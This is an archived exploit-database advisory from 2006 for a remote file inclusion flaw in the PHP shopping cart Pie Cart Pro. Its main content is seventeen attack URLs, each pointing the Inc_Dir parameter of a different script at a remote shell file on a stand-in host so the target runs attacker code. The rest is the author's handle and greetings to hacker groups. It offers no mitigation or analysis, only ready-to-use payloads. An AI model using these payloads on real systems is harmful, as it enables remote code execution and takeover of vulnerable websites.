Pie Cart Pro - 'Inc_Dir' Remote File Inclusion

EDB-ID:

2393


Platform:

PHP

Published:

2006-09-19

#====================================================================
# Pie Cart Pro => (Inc_Dir) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By SnIpEr_SA
#
#http://www.doodlebabies.com/
#
#=================================================================
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/affiliates.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/orders.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/events.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/index.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/articles.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/faqs.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/guestbook.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/catalog.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/wholesale.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/weblinks.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/certificates.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/sitesearch.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/contact.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/sitemap.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/search.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/registry.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/error.php?Inc_Dir=http://shell.com/shell.txt?
#
#==============================================================================
#Discoverd By : SnIpEr_SA
#
#Conatact : SnIpEr.SA[at]hotmail.com
#
#GreetZ : SaUdi HaCkRz , Devil-x , shereba, BlacK-Code, KILLERxXx ,Qptan,red devil , mazagi,Mohajer And All My Frind
#http://www.elite-team.cc/vb , www.3asfh.net ,www.lezr.com
============================================================================#

# milw0rm.com [2006-09-19]